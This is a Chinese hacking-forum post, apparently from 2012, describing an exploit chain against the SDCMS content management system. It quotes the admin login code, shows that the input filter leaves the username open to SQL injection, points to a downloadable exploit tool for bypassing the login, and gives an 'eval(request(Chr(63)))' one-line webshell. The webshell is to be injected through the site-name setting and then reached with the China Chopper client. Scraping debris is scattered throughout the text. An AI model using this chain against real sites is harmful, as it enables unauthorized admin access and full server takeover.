作者:T00LS 鬼哥1 P2 n$ O8 [& O. C( W4 n& b
漏洞文件:后台目录/index.asp
+ P" U. A* G3 s+ P* g. h
# C) L3 L& T; E+ z l: @. oSub Check3 N6 [9 [8 j, _! s a) N( h- k
Dim username,password,code,getcode,Rs/ O. l+ I- B$ o& ~
IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub# _6 f' G( }4 d9 D5 E1 F
username=FilterText(Trim(Request.Form("username")),1)
8 {8 ^7 h! V: O6 ?; w password=FilterText(Trim(Request.Form("password")),1): e- j( t; `# Y$ c5 O" z! `
code=Trim(Request.Form("yzm"))
5 ~" B# f1 j4 L/ u7 K getcode=Session("SDCMSCode")
# U5 B0 v# I( f1 H6 Q5 d# I) Z, c IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died6 z7 v; m' N- J8 [4 M0 }
IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied
. C2 l+ E6 x, o# l IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied7 e7 Y+ Q. D- [1 \& u$ Y, B% ?
IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied1 s6 n8 e9 Y# B& P
IF username="" or password="" Then) ^* W4 ~! \9 Q2 K6 c. O
Echo "用户名或密码不能为空"ied) i5 d ?4 y( `: w; B4 T* h. R
Else4 r( V3 D; B% A& Y
Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")! W0 ^9 ]" \: C
IF Rs.Eof Then
' A' H# \: |$ [ AddLog username,GetIp,"登录失败",15 J: n( E0 n% o' V
Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"
- K9 H( O7 z1 B3 g Else
1 z' q$ ?5 s7 K- l+ @ Add_Cookies "sdcms_id",Rs(0)
: y/ J R3 u! q" h Add_Cookies "sdcms_name",username& S+ y% z- w& M7 _+ t) O
Add_Cookies "sdcms_pwd",Rs(2)
! O: q% d+ n, i6 _' s Add_Cookies "sdcms_admin",Rs(3)
0 t6 g; i- i+ W) ~! e) l% I1 n Add_Cookies "sdcms_alllever",Rs(4)
+ o! |+ Y# s2 @! `( P* d- H Add_Cookies "sdcms_infolever",Rs(5)
% @/ r' [0 S% s Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
- Y+ v% ?2 c6 J0 T AddLog username,GetIp,"登录成功",1
5 q. F6 @' b1 [: B& d3 \7 e '自动删除30天前的Log记录3 g' c- R* u- E- W& B# f: h
IF Sdcms_DataType Then0 |$ l3 j0 F$ [* F% {
Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30") u* T& r; C; R$ n$ ~/ u# I, l
Else
) E- G& x, H1 d* b" q; ]# @( Y X Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
" T" m o8 [4 U! e8 o9 @! j End IF
5 W8 V0 I+ ?" v, G. z Go("sdcms_index.asp")
2 Z6 Y+ n3 b+ R- @& j4 F& [ End IF
- f+ z# U+ P; r, z/ p Rs.Close- w u5 |5 N) l% [6 R8 }
Set Rs=Nothing6 h. I9 C L! r1 P
End IF
2 A" m" a- U8 i+ \End Sub
" L1 _% f1 F9 J2 _5 \
& ?! w. i9 F5 j9 Z1 G8 s, U’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码
1 a/ ^# M. x5 P7 O1 x8 X, m% f3 \& ]
5 h, l1 @) n! C+ \Function FilterText(ByVal t0,ByVal t1)
/ `9 M0 Y( {( y X IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function
; t/ B! P4 w$ e% F8 C& f t0=Trim(t0)9 e8 j* s0 }8 P
Select Case t1
# }+ W1 x! @+ L% N/ U; n! L Case "1"
+ d7 v8 r4 [( ]5 E0 \ t0=Replace(t0,Chr(32),"")9 m: \! w: r) _
t0=Replace(t0,Chr(13),"")
' d3 F4 O/ q3 X5 |% M t0=Replace(t0,Chr(10)&Chr(10),""). a8 ^! z9 p. ]; w- L5 P: M* Z N
t0=Replace(t0,Chr(10),"")
+ e0 [" p x1 A+ [+ j Case "2"
6 t, Y Q$ f/ d. v* C( Z4 J6 _1 J t0=Replace(t0,Chr(8),"")'回格
- H+ t3 c) F5 B t0=Replace(t0,Chr(9),"")'tab(水平制表符)0 d# G6 \( A% t# _" ]) P6 G
t0=Replace(t0,Chr(10),"")'换行' x: r& D+ U) j; u: F$ U/ [% i1 e
t0=Replace(t0,Chr(11),"")'tab(垂直制表符)
5 ~2 A G- [! |6 R% H5 N t0=Replace(t0,Chr(12),"")'换页' V0 Z0 E, i1 L3 w, k1 {3 u3 U
t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合6 H8 i% I' I, O7 y. C' Y: L6 g
t0=Replace(t0,Chr(22),""), Y6 }6 d: _3 N/ h4 E
t0=Replace(t0,Chr(32),"")'空格 SPACE
2 g0 s1 G, w( |4 {9 z4 \" m t0=Replace(t0,Chr(33),"")'!
1 M- P% G0 n, W- u6 V0 {0 X t0=Replace(t0,Chr(34),"")'"
3 W7 H M7 ~/ ] t0=Replace(t0,Chr(35),"")'#/ I# ~) F/ x1 C% b. M/ H
t0=Replace(t0,Chr(36),"")'$- ~$ c) T0 ?) ]; [: {
t0=Replace(t0,Chr(37),"")'%
6 | O: W/ |. P: Y t0=Replace(t0,Chr(38),"")'&! N' a6 ?# Y: q& l& r
t0=Replace(t0,Chr(39),"")''0 O# i% K7 _: k: C6 _$ N9 s
t0=Replace(t0,Chr(40),"")'(
1 `& ^; L: S; i% Y t0=Replace(t0,Chr(41),"")')
( i7 R, c |3 m) n9 Z) k: F+ E t0=Replace(t0,Chr(42),"")'*! U7 f2 Q# @ L" O5 ~* b
t0=Replace(t0,Chr(43),"")'+& m( k, k3 A: R2 @( e5 F6 J
t0=Replace(t0,Chr(44),"")',+ i* x6 d! I/ O4 h
t0=Replace(t0,Chr(45),"")'-' t" k$ R. _( z, U
t0=Replace(t0,Chr(46),"")'.5 j3 ^# @" N" b0 v
t0=Replace(t0,Chr(47),"")'/3 n; E! A+ o$ S# d' f ?$ i3 i
t0=Replace(t0,Chr(58),"")':
9 Z0 U% L7 I0 v6 b/ d7 a& |8 }$ z t0=Replace(t0,Chr(59),"")';
/ p( s" x) G" S7 Q t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>
5 o# r8 S4 D" N- b; T7 t4 b- A t0=Replace(t0,Chr(63),"")'?7 ?# ^) _; |; o3 S; s, P$ _. w
t0=Replace(t0,Chr(64),"")'@) s7 h1 ]4 k: [/ [4 S
t0=Replace(t0,Chr(91),"")'\; Y* a; ?- j* ]+ h1 v" w# Q" P
t0=Replace(t0,Chr(92),"")'\6 C- T& R/ I% S1 q7 M0 a
t0=Replace(t0,Chr(93),"")']7 }3 A2 ?3 v9 }$ Z: M( q
t0=Replace(t0,Chr(94),"")'^
6 { V `2 Q* F! m t0=Replace(t0,Chr(95),"")'_8 F1 B6 ~+ o* d$ g6 O: _
t0=Replace(t0,Chr(96),"")'`7 D, l# ?' U/ ^% q9 y
t0=Replace(t0,Chr(123),"")'{
* m8 l1 n R j+ ^) K t0=Replace(t0,Chr(124),"")'|1 f5 L: F% u: }1 G
t0=Replace(t0,Chr(125),"")'}' s/ s+ b9 R0 i4 t
t0=Replace(t0,Chr(126),"")'~/ x) W0 r' S- X% E9 b
Case Else% D' ~/ g% V* g. \' @! M' Y
t0=Replace(t0, "&", "&") N& u5 G& n7 }* W- Q% h l
t0=Replace(t0, "'", "'")- e& C" A: B4 I2 d9 Y
t0=Replace(t0, """", """)5 G4 `6 Z& e' t" H$ Y1 r
t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")) W% J/ T. G5 z3 a% p7 G/ R
End Select6 g/ T1 S4 b$ v; G2 F& E
IF Instr(Lcase(t0),"expression")>0 Then0 |1 X* j+ D: B# C r9 g
t0=Replace(t0,"expression","e­xpression", 1, -1, 0)
* i: |$ X- _: p, ~/ d! D1 ^ End If
- U/ B9 d5 y4 U- @0 I7 M, L9 y FilterText=t0
/ b% l. A% e0 D5 V r* a; J( X$ zEnd Function
( J q, ~" a4 U K, B& ?# _! V6 N3 N" s8 T& v7 q5 ~
看到没。直接参数是1 只过滤
% G D8 {( f7 x% _: |7 l0 v t0=Replace(t0,Chr(32)," ")
3 J. I5 f8 O }# K n- i$ z$ a t0=Replace(t0,Chr(13),"")
* E$ w0 t. k- [. o: a# E9 o t0=Replace(t0,Chr(10)&Chr(10)," `" b% I5 y3 V3 X
")) K6 ~4 v# R* C; z* v& U
t0=Replace(t0,Chr(10),"
, I( T z, k4 G! ^0 L& l")' P2 U- i2 u/ X3 D
漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!
4 {$ i* c- Y! l8 fEXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP
2 A0 R: C* S0 M
o& m+ M- b5 v/ L! [, M测试:
; c/ h" Q" t2 X- C4 t
* b8 Z4 u) `! w( k+ x8 y/ T+ |7 t' U! r+ y9 M4 B* J
现在输入工具上验证码,然后点OK
3 Y1 K8 u; @# o, y& P; Y
; G$ `* d8 _' P6 O, y' v9 S8 _2 q' G9 K w8 X* V2 h$ S
看到我们直接进入后台管理界面了,呵呵!
; n- {$ b8 e$ ?7 Z- x
5 x; M8 w6 x, I2 y' ]: O6 B9 g) J5 c4 L7 U: i5 B
/ q! ~8 F+ P6 m$ {! g
这样直接进入后台了。。。。
; ~- X! P# f' S* u# x3 b) i& |0 b+ f6 W: j# {! f& U4 F
. W, Z6 |' P" i o9 p
5 n) W; P# y/ N: h# k
SDCMS提权:
* E: {. W5 B% `. {, S0 S. K0 J: f$ n5 t \& W
方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?4 _/ u/ B/ p1 R2 n Q
- {5 Y- i" o7 Q+ `% m
8 H4 }" z! x* {0 X" D# u/ i, N" D6 n6 p( \
OK,现在用菜刀连接下!
" `0 W9 W/ e8 M2 z2 m) z$ p+ i4 T( s
/ k- f. N7 n F
2 B; Y# v7 y z3 ]8 }
) W1 ^/ E' q, U" f, x& {& ^ U i8 I; k+ Y9 O+ Y0 C
|
发表于 2012-11-9 20:57:02
收藏
支持
反对